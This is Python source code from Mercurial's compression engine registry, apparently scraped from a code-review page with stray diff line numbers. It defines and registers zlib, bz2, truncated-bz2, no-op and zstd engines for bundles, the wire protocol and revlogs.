            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        """Obtain an engine registered to a wire protocol identifier.

        Will raise KeyError if the identifier isn't registered; aborts if
        the engine is known but not available.
        """
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]
3307
3306
# Global singleton registry through which all compression engines are
# registered and looked up.
compengines = compressormanager()
3309
3308
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        # Engines are assumed available unless a subclass says otherwise.
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3426
3425
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        """Yield DEFLATE-compressed chunks for the chunks in ``it``."""
        opts = opts or {}

        zctx = zlib.compressobj(opts.get('level', -1))
        for piece in it:
            out = zctx.compress(piece)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if out:
                yield out

        yield zctx.flush()

    def decompressorreader(self, fh):
        """Wrap ``fh`` so reads yield decompressed data."""
        def gen():
            dctx = zlib.decompressobj()
            for piece in filechunkiter(fh):
                while piece:
                    # Limit output size to limit memory.
                    yield dctx.decompress(piece, 2 ** 18)
                    piece = dctx.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            # Below this size compression can't win; don't bother.
            if insize < 44:
                return None

            if insize <= 1000000:
                compressed = zlib.compress(data)
                return compressed if len(compressed) < insize else None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            zctx = zlib.compressobj()
            parts = []
            pos = 0
            while pos < insize:
                nextpos = pos + 2**20
                parts.append(zctx.compress(data[pos:nextpos]))
                pos = nextpos
            parts.append(zctx.flush())

            if sum(len(p) for p in parts) < insize:
                return ''.join(parts)
            return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        # No zlib options are honored here; opts kept for interface parity.
        return self.zlibrevlogcompressor()
3511
3510
# zlib is part of the standard library, so register unconditionally.
compengines.register(_zlibengine())
3513
3512
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    def wireprotosupport(self):
        # We declare a protocol name but don't advertise by default because
        # it is slow (both priorities are 0).
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        """Yield bzip2-compressed chunks for the chunks in ``it``."""
        opts = opts or {}
        compressor = bz2.BZ2Compressor(opts.get('level', 9))
        for piece in it:
            out = compressor.compress(piece)
            if out:
                yield out

        yield compressor.flush()

    def decompressorreader(self, fh):
        """Wrap ``fh`` so reads yield decompressed data."""
        def gen():
            decompressor = bz2.BZ2Decompressor()
            for piece in filechunkiter(fh):
                yield decompressor.decompress(piece)

        return chunkbuffer(gen())
3554
3553
# bz2 is part of the standard library, so register unconditionally.
compengines.register(_bz2engine())
3556
3555
class _truncatedbz2engine(compressionengine):
    """bz2 decompression for streams that lack the leading 'BZ' magic.

    Internal-only (no user-facing bundle spec name); used for legacy
    bundle data stored without the header.
    """
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # First element None: excluded from external/user-facing usage.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        """Wrap ``fh`` so reads yield decompressed data."""
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            # Use a bytes literal: BZ2Decompressor.decompress() requires
            # bytes on Python 3, and b'BZ' is identical to 'BZ' on Python 2.
            d.decompress(b'BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())
3575
3574
3576 compengines.register(_truncatedbz2engine())
3575 compengines.register(_truncatedbz2engine())
3577
3576
class _noopengine(compressionengine):
    """Identity engine: payloads pass through without any compression."""

    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # Identity transform: hand the chunk iterator back untouched.
        return it

    def decompressorreader(self, fh):
        # Identity transform: the file object is already "decompressed".
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # Returning None tells the revlog to store the data as-is.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
3612
3611
class _zstdengine(compressionengine):
    """Compression engine backed by the bundled python-zstandard module."""

    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not every install ships the zstd module, so resolve it lazily on
        # first access and treat an ImportError as "unavailable".
        try:
            from . import zstd
            # Touch an attribute to force any delayed import machinery.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        options = opts if opts else {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = options.get('level', 3)

        zstd = self._module
        cobj = zstd.ZstdCompressor(level=level).compressobj()
        for piece in it:
            compressed = cobj.compress(piece)
            if compressed:
                yield compressed
        yield cobj.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output.
            # However, it allows decompression to be more optimal since we
            # can pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Too small for compression to plausibly pay off.
                return None
            elif insize <= 1000000:
                # Mid-size inputs: one-shot compress, keep only if smaller.
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Large inputs: feed the streaming compressor in
                # recommended-size windows.
                cobj = self._cctx.compressobj()
                parts = []
                offset = 0
                while offset < insize:
                    end = offset + self._compinsize
                    out = cobj.compress(data[offset:end])
                    if out:
                        parts.append(out)
                    offset = end
                parts.append(cobj.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                parts = []
                offset = 0
                while offset < insize:
                    end = offset + self._decompinsize
                    out = dobj.decompress(data[offset:end])
                    if out:
                        parts.append(out)
                    offset = end
                # Frame should be exhausted, so no finish() API.

                return ''.join(parts)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        options = opts if opts else {}
        return self.zstdrevlogcompressor(self._module,
                                         level=options.get('level', 3))

compengines.register(_zstdengine())
3741
3740
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    topics = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for enginename in compengines:
        engine = compengines[enginename]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n %s') % (
            bt[0], engine.bundletype.__doc__)

        holder = docobject()
        holder.__doc__ = doc
        holder._origdoc = engine.bundletype.__doc__
        holder._origfunc = engine.bundletype

        topics[bt[0]] = holder

    return topics

# Registered so the per-engine bundletype docstrings are picked up for i18n.
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now